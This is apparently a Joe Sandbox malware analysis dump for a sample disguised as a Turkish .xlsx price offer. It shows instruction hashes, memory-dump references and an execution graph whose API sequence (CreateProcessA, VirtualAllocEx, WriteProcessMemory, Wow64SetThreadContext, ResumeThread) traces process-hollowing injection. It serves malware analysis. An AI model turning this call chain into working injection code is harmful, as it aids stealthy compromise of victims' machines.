                                                                        • Instruction Fuzzy Hash: 9F11AC75508244DFCB15CF14DAC4B16BB62FB44318F28C6ADE8494B692C33BD84ACB52
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6ede1cb0a9921ffb98da85d5b82558549df50ca8d5faa47aef8aed3f17fed039
                                                                        • Instruction ID: cdf1aa3d1df98ae94cfbb8259287b2dda6e2e33281faf0bb973cb21c160406c0
                                                                        • Opcode Fuzzy Hash: 6ede1cb0a9921ffb98da85d5b82558549df50ca8d5faa47aef8aed3f17fed039
                                                                        • Instruction Fuzzy Hash: 1E01A4317042504FDB265A2DD854A297BEEEFC9A59719417AE546CB3B6EA24CC02C348
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 119bc0b7347cd31478dfd662be1101624497ed64692abb8aa475e1f87c4d428e
                                                                        • Instruction ID: 2d6c9bae57583fac2d2f59f93f56b06a29e95a77b934d0f9db6966863f79be90
                                                                        • Opcode Fuzzy Hash: 119bc0b7347cd31478dfd662be1101624497ed64692abb8aa475e1f87c4d428e
                                                                        • Instruction Fuzzy Hash: 4501DB327001156FDB259E699810AEF7FEBEFC8750F148026F515D7288CE718D1587A4
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6587123999f0b8ae890ef4ced696a458315b59e290e022dc9cb0762bb06707c9
                                                                        • Instruction ID: cd3a610bc69c2bd31523fe5147cb7a6cb2b4a959191b3d20cacab813b403e2a4
                                                                        • Opcode Fuzzy Hash: 6587123999f0b8ae890ef4ced696a458315b59e290e022dc9cb0762bb06707c9
                                                                        • Instruction Fuzzy Hash: 23010879D0020A9FDF40DFA9E844AAEBBB1FB49310F10466AE910A3354D7355A56CF81
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1d624871ba061daaaf88ea5f4a60d8e4136dee4932259e26dab04031489fc6c1
                                                                        • Instruction ID: bfcc7d2907880446afe2240b7a22eff3a40ffa5a315f375445563615121b7598
                                                                        • Opcode Fuzzy Hash: 1d624871ba061daaaf88ea5f4a60d8e4136dee4932259e26dab04031489fc6c1
                                                                        • Instruction Fuzzy Hash: A2F08C32A00218DFDF11CF69D848BEEBBF9EBC8369F00C026E908C3214D3714A158B90
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 167486725ec59683f909f9b15cc4d155dd72d821a0f8f292bcfa0f4fbb061a44
                                                                        • Instruction ID: c115f34dbcdc6acf005884a18cf46a69df997fa9965eeb8a1eed76f1ccc58ac0
                                                                        • Opcode Fuzzy Hash: 167486725ec59683f909f9b15cc4d155dd72d821a0f8f292bcfa0f4fbb061a44
                                                                        • Instruction Fuzzy Hash: C5E0DF31D243668BC711EBB49C140EEBB34AE92321B18466BC42136591FB345658C7A2
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 58f20c213b7aa071458628aaaf998ec6c6d8ca3763c46497d05dc523b4d837cc
                                                                        • Instruction ID: e42ebbf128c8c19ff58ee571dddb1bd7c3888a3189795c5033a8ec6cf5a01fc2
                                                                        • Opcode Fuzzy Hash: 58f20c213b7aa071458628aaaf998ec6c6d8ca3763c46497d05dc523b4d837cc
                                                                        • Instruction Fuzzy Hash: 87D01231D2032A578B10A7A9DC144DFBB38EE95721B504626D91437544EB70665986A1
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4114b4598658910b842537372e31101a8a048b75bbf0aee6e6298ed1bcc0face
                                                                        • Instruction ID: 079f7f05e16a32968f029ae3d17247ecdff4ff1d31e85d53a01793905d371b28
                                                                        • Opcode Fuzzy Hash: 4114b4598658910b842537372e31101a8a048b75bbf0aee6e6298ed1bcc0face
                                                                        • Instruction Fuzzy Hash: 4AD0127310D0641AE635515D3D449A75B8ED7C537971503A7FA5CE7601D8028C854169
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 513b75dcfb6b3639d1fa2c61a642428418cdb1b7100e96645d9536f9f0bb91a6
                                                                        • Instruction ID: 6fe0d302875b8a76598a469ab5daa7db4c573a97e5688e780e86f62c846ddc66
                                                                        • Opcode Fuzzy Hash: 513b75dcfb6b3639d1fa2c61a642428418cdb1b7100e96645d9536f9f0bb91a6
                                                                        • Instruction Fuzzy Hash: 0DD0E234E0420CCBCF30DFB8E4844DCBB75EB88325F10552AE925A3210C63014118F41
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: facb2d2d11236406ef818c69306493be0c21e30c3b4d0ab27306c4274751cf9b
                                                                        • Instruction ID: ddcdbd9046eb9a191031aa2053f37b5f5e6193ce36faf60af8e6b3f082b05284
                                                                        • Opcode Fuzzy Hash: facb2d2d11236406ef818c69306493be0c21e30c3b4d0ab27306c4274751cf9b
                                                                        • Instruction Fuzzy Hash: A4D0677BB401089FCB149F98E8409DDF7B6FB98221B548117E915A3264C6319925DB90
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9203705c253628b677eec4d4358a1e92c2f92b39663dde4447abba53bf594430
                                                                        • Instruction ID: 3158aa94af8fad5b5ab36d306d20c8bac1ae480aa0d7e455462b003a692990df
                                                                        • Opcode Fuzzy Hash: 9203705c253628b677eec4d4358a1e92c2f92b39663dde4447abba53bf594430
                                                                        • Instruction Fuzzy Hash: 62D0A93450032147EA25A779A941096332BABC4200B049A20B0040E60EEF30544A87A2
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 30e7b838dd9841d50279e7cb5d7bed45bc13ec4ca0800d3b6e00a8ddfcc126ea
                                                                        • Instruction ID: 5c71c0663414debdb3ab2f8f42d7dabd5cd65e0611849fc6bdbedc84758b91ca
                                                                        • Opcode Fuzzy Hash: 30e7b838dd9841d50279e7cb5d7bed45bc13ec4ca0800d3b6e00a8ddfcc126ea
                                                                        • Instruction Fuzzy Hash: 89C012345003144BEA55F77AFC45596735ED7C0600B409A30B0050E14EBF74294A47A1
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 302322be9e8da13687dd49746bfe620fd8e47853d7f4e6b9f50e0ca00841bde2
                                                                        • Instruction ID: 462745150e86848943c86f4a0089056d11a3df0531b5ca6735b6cb5398831ddc
                                                                        • Opcode Fuzzy Hash: 302322be9e8da13687dd49746bfe620fd8e47853d7f4e6b9f50e0ca00841bde2
                                                                        • Instruction Fuzzy Hash: 5AC1C374E00218CFEB54DFA9C994B9DBBB6BF89304F5081A9E409AB355DB345E81CF10
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d35c25783b1fc8118f015809df1d048d776e725a434b3153725f0684f75b8ec6
                                                                        • Instruction ID: 6eb08c4963dddfdb66cca1cd33a2ca8af38697ac97fcc8d6da84640fe4691fc1
                                                                        • Opcode Fuzzy Hash: d35c25783b1fc8118f015809df1d048d776e725a434b3153725f0684f75b8ec6
                                                                        • Instruction Fuzzy Hash: A7C1B374E00218CFEB54DFA5C994B9DBBB2BF89304F5081A9E409AB355DB359E85CF10
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.3800985488.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_1330000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: \;q$\;q$\;q$\;q
                                                                        • API String ID: 0-2933265366
                                                                        • Opcode ID: 24287093f364f11caa3a7395259e00d6c44bb8bd2ee4c9d72e415a3e26199270
                                                                        • Instruction ID: 8c475896f044572118c65db7cf9d0c5cfc9346cbbe3ecf7f31a5769fc2993a27
                                                                        • Opcode Fuzzy Hash: 24287093f364f11caa3a7395259e00d6c44bb8bd2ee4c9d72e415a3e26199270
                                                                        • Instruction Fuzzy Hash: 0901F271700108AFC720DE2DC942AA537EABFC8A68729416AE506CB371DA31ED418748

                                                                        Execution Graph

                                                                        Execution Coverage:10.5%
                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                        Signature Coverage:0%
                                                                        Total number of Nodes:329
                                                                        Total number of Limit Nodes:14
                                                                        execution_graph 33815 102ac50 33818 102ad48 33815->33818 33816 102ac5f 33819 102ad7c 33818->33819 33820 102ad59 33818->33820 33819->33816 33820->33819 33821 102af80 GetModuleHandleW 33820->33821 33822 102afad 33821->33822 33822->33816 34117 102cfe0 34118 102d026 34117->34118 34122 102d5c8 34118->34122 34125 102d5b9 34118->34125 34119 102d113 34124 102d5f6 34122->34124 34128 102d21c 34122->34128 34124->34119 34126 102d21c DuplicateHandle 34125->34126 34127 102d5f6 34126->34127 34127->34119 34129 102d630 DuplicateHandle 34128->34129 34130 102d6c6 34129->34130 34130->34124 33823 71b9088 33824 71b9213 33823->33824 33826 71b90ae 33823->33826 33826->33824 33827 71b6b08 33826->33827 33828 71b9308 PostMessageW 33827->33828 33829 71b9374 33828->33829 33829->33826 33830 71b644f 33835 71b7e8e 33830->33835 33855 71b7e20 33830->33855 33874 71b7e30 33830->33874 33831 71b6468 33836 71b7e1c 33835->33836 33837 71b7e91 33835->33837 33849 71b7e6e 33836->33849 33893 71b895b 33836->33893 33897 71b85e4 33836->33897 33902 71b86e7 33836->33902 33907 71b88c1 33836->33907 33911 71b85a3 33836->33911 33916 71b854c 33836->33916 33920 71b8848 33836->33920 33925 71b8148 33836->33925 33931 71b820b 33836->33931 33936 71b8494 33836->33936 33940 71b8437 33836->33940 33946 71b8590 33836->33946 33950 71b8613 33836->33950 33955 71b8138 33836->33955 33961 71b8af9 33836->33961 33965 71b82ba 33836->33965 33837->33831 33849->33831 33856 71b7e4a 33855->33856 33857 71b895b 2 API calls 33856->33857 33858 71b82ba 2 API calls 33856->33858 33859 71b8af9 2 API calls 33856->33859 33860 71b8138 2 API calls 33856->33860 33861 71b8613 2 API calls 33856->33861 33862 71b8590 2 API calls 33856->33862 33863 71b8437 4 API calls 33856->33863 33864 71b8494 2 API calls 33856->33864 33865 71b820b 2 API calls 33856->33865 33866 71b8148 2 API calls 33856->33866 33867 71b8848 2 API calls 33856->33867 33868 71b7e6e 33856->33868 33869 71b854c 2 API calls 33856->33869 33870 71b85a3 2 API calls 33856->33870 33871 71b88c1 2 API calls 33856->33871 33872 71b86e7 2 API calls 33856->33872 33873 71b85e4 2 API calls 33856->33873 33857->33868 33858->33868 33859->33868 33860->33868 33861->33868 33862->33868 33863->33868 33864->33868 33865->33868 33866->33868 33867->33868 33868->33831 33869->33868 33870->33868 33871->33868 33872->33868 33873->33868 33875 71b7e4a 33874->33875 33876 71b895b 2 API calls 33875->33876 33877 71b82ba 2 API calls 33875->33877 33878 71b8af9 2 API calls 33875->33878 33879 71b8138 2 API calls 33875->33879 33880 71b8613 2 API calls 33875->33880 33881 71b8590 2 API calls 33875->33881 33882 71b8437 4 API calls 33875->33882 33883 71b8494 2 API calls 33875->33883 33884 71b820b 2 API calls 33875->33884 33885 71b8148 2 API calls 33875->33885 33886 71b8848 2 API calls 33875->33886 33887 71b7e6e 33875->33887 33888 71b854c 2 API calls 33875->33888 33889 71b85a3 2 API calls 33875->33889 33890 71b88c1 2 API calls 33875->33890 33891 71b86e7 2 API calls 33875->33891 33892 71b85e4 2 API calls 33875->33892 33876->33887 33877->33887 33878->33887 33879->33887 33880->33887 33881->33887 33882->33887 33883->33887 33884->33887 33885->33887 33886->33887 33887->33831 33888->33887 33889->33887 33890->33887 33891->33887 33892->33887 33971 71b59a8 33893->33971 33975 71b59a0 33893->33975 33894 71b897f 33894->33849 33898 71b85f4 33897->33898 33900 71b59a8 WriteProcessMemory 33898->33900 33901 71b59a0 WriteProcessMemory 33898->33901 33899 71b86ad 33899->33849 33900->33899 33901->33899 33903 71b85e3 33902->33903 33904 71b86ad 33902->33904 33905 71b59a8 WriteProcessMemory 33903->33905 33906 71b59a0 WriteProcessMemory 33903->33906 33904->33849 33905->33904 33906->33904 33908 71b88dc 33907->33908 33979 71b5328 33908->33979 33983 71b5320 33908->33983 33912 71b85b5 33911->33912 33987 71b58e8 33912->33987 33991 71b58e0 33912->33991 33913 71b8cf6 33995 71b5a98 33916->33995 33999 71b5a90 33916->33999 33917 71b8503 33917->33849 33921 71b884e 33920->33921 33922 71b89be 33921->33922 33923 71b59a8 WriteProcessMemory 33921->33923 33924 71b59a0 WriteProcessMemory 33921->33924 33922->33849 33923->33921 33924->33921 33927 71b817b 33925->33927 33926 71b823e 33926->33849 33927->33926 34003 71b5c30 33927->34003 34007 71b5c24 33927->34007 33932 71b8214 33931->33932 33934 71b5c30 CreateProcessA 33932->33934 33935 71b5c24 CreateProcessA 33932->33935 33933 71b837f 33933->33849 33934->33933 33935->33933 33937 71b84b3 33936->33937 33938 71b5328 ResumeThread 33937->33938 33939 71b5320 ResumeThread 33937->33939 33938->33937 33939->33937 34011 71b53d8 33940->34011 34015 71b53d0 33940->34015 33941 71b8451 33942 71b5328 ResumeThread 33941->33942 33943 71b5320 ResumeThread 33941->33943 33942->33941 33943->33941 33947 71b859d 33946->33947 33948 71b5328 ResumeThread 33947->33948 33949 71b5320 ResumeThread 33947->33949 33948->33947 33949->33947 33951 71b885f 33950->33951 33952 71b89be 33951->33952 33953 71b59a8 WriteProcessMemory 33951->33953 33954 71b59a0 WriteProcessMemory 33951->33954 33952->33849 33953->33951 33954->33951 33957 71b8148 33955->33957 33956 71b823e 33956->33849 33957->33956 33959 71b5c30 CreateProcessA 33957->33959 33960 71b5c24 CreateProcessA 33957->33960 33958 71b837f 33958->33849 33959->33958 33960->33958 33963 71b53d8 Wow64SetThreadContext 33961->33963 33964 71b53d0 Wow64SetThreadContext 33961->33964 33962 71b8b13 33963->33962 33964->33962 33967 71b8214 33965->33967 33966 71b823e 33966->33849 33967->33966 33969 71b5c30 CreateProcessA 33967->33969 33970 71b5c24 CreateProcessA 33967->33970 33968 71b837f 33968->33849 33969->33968 33970->33968 33972 71b59a9 WriteProcessMemory 33971->33972 33974 71b5a47 33972->33974 33974->33894 33976 71b59a4 WriteProcessMemory 33975->33976 33978 71b5a47 33976->33978 33978->33894 33980 71b5368 ResumeThread 33979->33980 33982 71b5399 33980->33982 33982->33908 33984 71b5328 ResumeThread 33983->33984 33986 71b5399 33984->33986 33986->33908 33988 71b58e9 VirtualAllocEx 33987->33988 33990 71b5965 33988->33990 33990->33913 33992 71b58e4 VirtualAllocEx 33991->33992 33994 71b5965 33992->33994 33994->33913 33996 71b5ae3 ReadProcessMemory 33995->33996 33998 71b5b27 33996->33998 33998->33917 34000 71b5a98 ReadProcessMemory 33999->34000 34002 71b5b27 34000->34002 34002->33917 34004 71b5c31 CreateProcessA 34003->34004 34006 71b5e7b 34004->34006 34008 71b5c28 CreateProcessA 34007->34008 34010 71b5e7b 34008->34010 34012 71b541d Wow64SetThreadContext 34011->34012 34014 71b5465 34012->34014 34014->33941 34016 71b53d8 Wow64SetThreadContext 34015->34016 34018 71b5465 34016->34018 34018->33941 34019 51e6a48 34020 51e6a75 34019->34020 34031 51e6654 34020->34031 34023 51e6654 2 API calls 34024 51e6b2d 34023->34024 34025 51e6654 2 API calls 34024->34025 34026 51e6b5f 34025->34026 34027 51e6654 2 API calls 34026->34027 34028 51e6b91 34027->34028 34035 51e6664 34028->34035 34030 51e6bc3 34032 51e665f 34031->34032 34040 51e6764 34032->34040 34034 51e6afb 34034->34023 34036 51e666f 34035->34036 34038 1025cc4 2 API calls 34036->34038 34039 10282a8 2 API calls 34036->34039 34037 51e806b 34037->34030 34038->34037 34039->34037 34041 51e676f 34040->34041 34045 1025cc4 34041->34045 34050 10282a8 34041->34050 34042 51e7dec 34042->34034 34046 1025ccf 34045->34046 34047 10285a9 34046->34047 34055 102cd08 34046->34055 34060 102cd18 34046->34060 34047->34042 34052 10282ab 34050->34052 34051 10285a9 34051->34042 34052->34051 34053 102cd08 2 API calls 34052->34053 34054 102cd18 2 API calls 34052->34054 34053->34051 34054->34051 34056 102cd00 34055->34056 34057 102cd16 34055->34057 34056->34047 34058 102cd5d 34057->34058 34064 102cec8 34057->34064 34058->34047 34061 102cd39 34060->34061 34062 102cd5d 34061->34062 34063 102cec8 2 API calls 34061->34063 34062->34047 34063->34062 34066 102ced5 34064->34066 34065 102cf0f 34065->34058 34066->34065 34068 102ba80 34066->34068 34069 102ba8b 34068->34069 34071 102dc28 34069->34071 34072 102d27c 34069->34072 34071->34071 34073 102d287 34072->34073 34074 1025cc4 2 API calls 34073->34074 34075 102dc97 34074->34075 34079 102fa28 34075->34079 34085 102fa10 34075->34085 34076 102dcd1 34076->34071 34081 102fa59 34079->34081 34082 102fb59 34079->34082 34080 102fa65 34080->34076 34081->34080 34090 51e09b0 34081->34090 34096 51e09c0 34081->34096 34082->34076 34087 102fa28 34085->34087 34086 102fa65 34086->34076 34087->34086 34088 51e09b0 2 API calls 34087->34088 34089 51e09c0 2 API calls 34087->34089 34088->34086 34089->34086 34092 51e09c0 34090->34092 34091 51e0a9a 34091->34091 34092->34091 34102 51e1852 34092->34102 34108 51e18a0 34092->34108 34112 51e1890 34092->34112 34098 51e09eb 34096->34098 34097 51e0a9a 34097->34097 34098->34097 34099 51e1852 2 API calls 34098->34099 34100 51e1890 2 API calls 34098->34100 34101 51e18a0 2 API calls 34098->34101 34099->34097 34100->34097 34101->34097 34103 51e185d 34102->34103 34104 51e187b 34103->34104 34106 51e18e5 CreateWindowExW 34103->34106 34107 51e18f0 CreateWindowExW 34103->34107 34104->34091 34105 51e18d5 34105->34091 34106->34105 34107->34105 34110 51e18e5 CreateWindowExW 34108->34110 34111 51e18f0 CreateWindowExW 34108->34111 34109 51e18d5 34109->34091 34110->34109 34111->34109 34113 51e18a0 34112->34113 34115 51e18e5 CreateWindowExW 34113->34115 34116 51e18f0 CreateWindowExW 34113->34116 34114 51e18d5 34114->34091 34115->34114 34116->34114 34131 1024668 34132 102467a 34131->34132 34138 1024778 34132->34138 34143 10246b8 34132->34143 34133 1024686 34149 1023e28 34133->34149 34135 10246a5 34139 102479d 34138->34139 34153 1024878 34139->34153 34157 1024888 34139->34157 34144 10246c2 34143->34144 34145 10246ac 34144->34145 34147 1024878 CreateActCtxA 34144->34147 34148 1024888 CreateActCtxA 34144->34148 34145->34133 34146 10247a7 34146->34133 34147->34146 34148->34146 34150 1023e33 34149->34150 34165 1025c44 34150->34165 34152 1026ff0 34152->34135 34155 10248af 34153->34155 34154 102498c 34154->34154 34155->34154 34161 10244b0 34155->34161 34159 10248af 34157->34159 34158 102498c 34159->34158 34160 10244b0 CreateActCtxA 34159->34160 34160->34158 34162 1025918 CreateActCtxA 34161->34162 34164 10259db 34162->34164 34166 1025c4f 34165->34166 34169 1025c64 34166->34169 34168 1027095 34168->34152 34170 1025c6f 34169->34170 34173 1025c94 34170->34173 34172 102717a 34172->34168 34174 1025c9f 34173->34174 34175 1025cc4 2 API calls 34174->34175 34176 102726d 34175->34176 34176->34172 34177 e3d01c 34178 e3d034 34177->34178 34179 e3d08e 34178->34179 34184 51e1aa8 34178->34184 34189 51e1a97 34178->34189 34194 51e2808 34178->34194 34199 51e2818 34178->34199 34185 51e1ace 34184->34185 34187 51e2818 2 API calls 34185->34187 34188 51e2808 2 API calls 34185->34188 34186 51e1aef 34186->34179 34187->34186 34188->34186 34190 51e1aa8 34189->34190 34192 51e2818 2 API calls 34190->34192 34193 51e2808 2 API calls 34190->34193 34191 51e1aef 34191->34179 34192->34191 34193->34191 34195 51e2818 34194->34195 34196 51e2877 34195->34196 34204 51e2990 34195->34204 34209 51e29a0 34195->34209 34200 51e2845 34199->34200 34201 51e2877 34200->34201 34202 51e2990 2 API calls 34200->34202 34203 51e29a0 2 API calls 34200->34203 34202->34201 34203->34201 34206 51e29a0 34204->34206 34205 51e2a40 34205->34196 34214 51e2a47 34206->34214 34218 51e2a58 34206->34218 34211 51e29b4 34209->34211 34210 51e2a40 34210->34196 34212 51e2a58 2 API calls 34211->34212 34213 51e2a47 2 API calls 34211->34213 34212->34210 34213->34210 34215 51e2a58 34214->34215 34216 51e2a69 34215->34216 34221 51e4012 34215->34221 34216->34205 34219 51e2a69 34218->34219 34220 51e4012 2 API calls 34218->34220 34219->34205 34220->34219 34225 51e4040 34221->34225 34229 51e4030 34221->34229 34222 51e402a 34222->34216 34226 51e4082 34225->34226 34228 51e4089 34225->34228 34227 51e40da CallWindowProcW 34226->34227 34226->34228 34227->34228 34228->34222 34230 51e4040 34229->34230 34231 51e40da CallWindowProcW 34230->34231 34232 51e4089 34230->34232 34231->34232 34232->34222

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 294 102ad48-102ad57 295 102ad83-102ad87 294->295 296 102ad59-102ad66 call 102a06c 294->296 297 102ad9b-102addc 295->297 298 102ad89-102ad93 295->298 301 102ad68 296->301 302 102ad7c 296->302 305 102ade9-102adf7 297->305 306 102adde-102ade6 297->306 298->297 349 102ad6e call 102afe0 301->349 350 102ad6e call 102afd1 301->350 302->295 308 102ae1b-102ae1d 305->308 309 102adf9-102adfe 305->309 306->305 307 102ad74-102ad76 307->302 312 102aeb8-102af78 307->312 313 102ae20-102ae27 308->313 310 102ae00-102ae07 call 102a078 309->310 311 102ae09 309->311 315 102ae0b-102ae19 310->315 311->315 344 102af80-102afab GetModuleHandleW 312->344 345 102af7a-102af7d 312->345 316 102ae34-102ae3b 313->316 317 102ae29-102ae31 313->317 315->313 319 102ae48-102ae51 call 102a088 316->319 320 102ae3d-102ae45 316->320 317->316 325 102ae53-102ae5b 319->325 326 102ae5e-102ae63 319->326 320->319 325->326 328 102ae81-102ae85 326->328 329 102ae65-102ae6c 326->329 333 102ae8b-102ae8e 328->333 329->328 330 102ae6e-102ae7e call 102a098 call 102a0a8 329->330 330->328 335 102ae90-102aeae 333->335 336 102aeb1-102aeb7 333->336 335->336 346 102afb4-102afc8 344->346 347 102afad-102afb3 344->347 345->344 347->346 349->307 350->307
                                                                        APIs
                                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 0102AF9E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1419204475.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_1020000_YzkHZRBcm.jbxd
                                                                        Similarity
                                                                        • API ID: HandleModule
                                                                        • String ID: $O$$O
                                                                        • API String ID: 4139908857-2259736977
                                                                        • Opcode ID: 9cb15b7c2f9e8ba6a925fe0dcaef520b9f2067a2669c535e28cca395a19ce55d
                                                                        • Instruction ID: 41a90c9d098e8f69c736351157abfb0305b0983e5004df4da80e53c30d5e9382
                                                                        • Opcode Fuzzy Hash: 9cb15b7c2f9e8ba6a925fe0dcaef520b9f2067a2669c535e28cca395a19ce55d
                                                                        • Instruction Fuzzy Hash: 07713870A00B15CFEB64DF29D44579ABBF1BF88304F00892DE486D7A50DB79E94ACB94

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1048 71b5c24-71b5c26 1049 71b5c28-71b5c2a 1048->1049 1050 71b5c2d-71b5c30 1048->1050 1051 71b5c2c 1049->1051 1052 71b5c31-71b5cc5 1049->1052 1050->1052 1051->1050 1055 71b5cfe-71b5d1e 1052->1055 1056 71b5cc7-71b5cd1 1052->1056 1061 71b5d20-71b5d2a 1055->1061 1062 71b5d57-71b5d86 1055->1062 1056->1055 1057 71b5cd3-71b5cd5 1056->1057 1059 71b5cf8-71b5cfb 1057->1059 1060 71b5cd7-71b5ce1 1057->1060 1059->1055 1063 71b5ce3 1060->1063 1064 71b5ce5-71b5cf4 1060->1064 1061->1062 1065 71b5d2c-71b5d2e 1061->1065 1072 71b5d88-71b5d92 1062->1072 1073 71b5dbf-71b5e79 CreateProcessA 1062->1073 1063->1064 1064->1064 1066 71b5cf6 1064->1066 1067 71b5d51-71b5d54 1065->1067 1068 71b5d30-71b5d3a 1065->1068 1066->1059 1067->1062 1070 71b5d3e-71b5d4d 1068->1070 1071 71b5d3c 1068->1071 1070->1070 1074 71b5d4f 1070->1074 1071->1070 1072->1073 1075 71b5d94-71b5d96 1072->1075 1084 71b5e7b-71b5e81 1073->1084 1085 71b5e82-71b5f08 1073->1085 1074->1067 1077 71b5db9-71b5dbc 1075->1077 1078 71b5d98-71b5da2 1075->1078 1077->1073 1079 71b5da6-71b5db5 1078->1079 1080 71b5da4 1078->1080 1079->1079 1081 71b5db7 1079->1081 1080->1079 1081->1077 1084->1085 1095 71b5f0a-71b5f0e 1085->1095 1096 71b5f18-71b5f1c 1085->1096 